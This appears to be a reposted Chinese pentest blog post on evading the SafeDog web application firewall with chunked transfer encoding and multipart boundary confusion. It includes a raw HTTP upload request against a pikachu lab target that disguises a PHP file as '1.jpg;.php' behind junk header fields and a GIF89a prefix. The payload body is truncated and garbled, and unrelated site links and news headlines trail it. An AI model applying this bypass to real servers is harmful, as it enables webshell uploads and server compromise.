文件上传绕过最新版安全狗
创始人
2024-11-04 07:04:35
本文来源无问社区,更多实战内容,渗透思路可前往查看icon-default.png?t=N7T8http://www.wwlib.cn/index.php/artread/artid/9960.html
http分块传输绕过

http分块传输⼀直是⼀个很经典的绕过⽅式,只是在近⼏年分块传输⼀直被卡的很死,很多waf都开始加

⼊了检测功能,所以的话,分块传输这⾥也不是很好使,但是配合边界混淆,好使的⼀批。

单纯http分块传输(已经⽆法绕过)

图片

图片

图片

boundary边界混淆绕过

图片

图片

图片

配合开源的⽅式来进⾏绕过

开源绕过1

在百度上有很多开源的⽅式来绕过安全狗,但是⼀⼀测试发现,绕过效果⾮常之垃圾,⼏乎都遇到了狗的阻拦,所以这⾥就经过变种+fuzz,来实现绕过安全狗,直接贴代码。

图片

POST /pikachu-master/vul/unsafeupload/clientcheck.php HTTP/1.1 Host: 192.168.172.161 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------378605579232816195651620102739 Content-Length: 448 Origin: http://192.168.172.161 Connection: close Referer: http://192.168.172.161/pikachu-master/vul/unsafeupload/clientcheck.php Cookie: PHPSESSID=sop5homauph2bdfeidn6ttv8l1 Upgrade-Insecure-Requests: 1  -----------------------------378605579232816195651620102739 Content-Disposition: form-data; name="uploadfile";fagfhaiofnalkvjoaffufile name=fjalfmavlaa; filename="1.jpg;.php Content-Type: image/jpeg GIF89a ]\' d]\[' /\' \]']\' /\]' w

上一篇:高通骁龙210处理器-高通骁龙 210 处理器:小巧玲珑却能量巨大,稳定省电超流畅

下一篇:谷粒商城实战笔记-117-全文检索-ElasticSearch-进阶-term查询

相关内容

热门资讯

裸辞做“一人公司”,我后悔了 去年这个时候,一位以色列程序员正在东南亚旅行。他顺手把一个在脑子里转了很久的想法做成了产品,一个让任...
南京建成国内首个Pre-6G试... 4月21日,2026全球6G技术与产业生态大会在南京开幕。全息互动技术展台前,一名远在北京的工作人员...
超梵求职受邀参加“2025抖音... 超梵求职受邀参加“2025抖音巨量引擎成人教育行业生态大会”,探讨分享优质内容传播,服务万千学员。 ...
摩托罗拉Razr 2026(R... IT之家 4 月 22 日消息,摩托罗拉宣布新一代 Razr 折叠手机将于 4 月 29 日在美国发...
库克卸任,特纳斯领航:苹果新纪... 苹果首席执行官蒂姆·库克将卸任,硬件工程主管约翰·特纳斯将接任,苹果公司今天宣布此事。 库克将在夏季...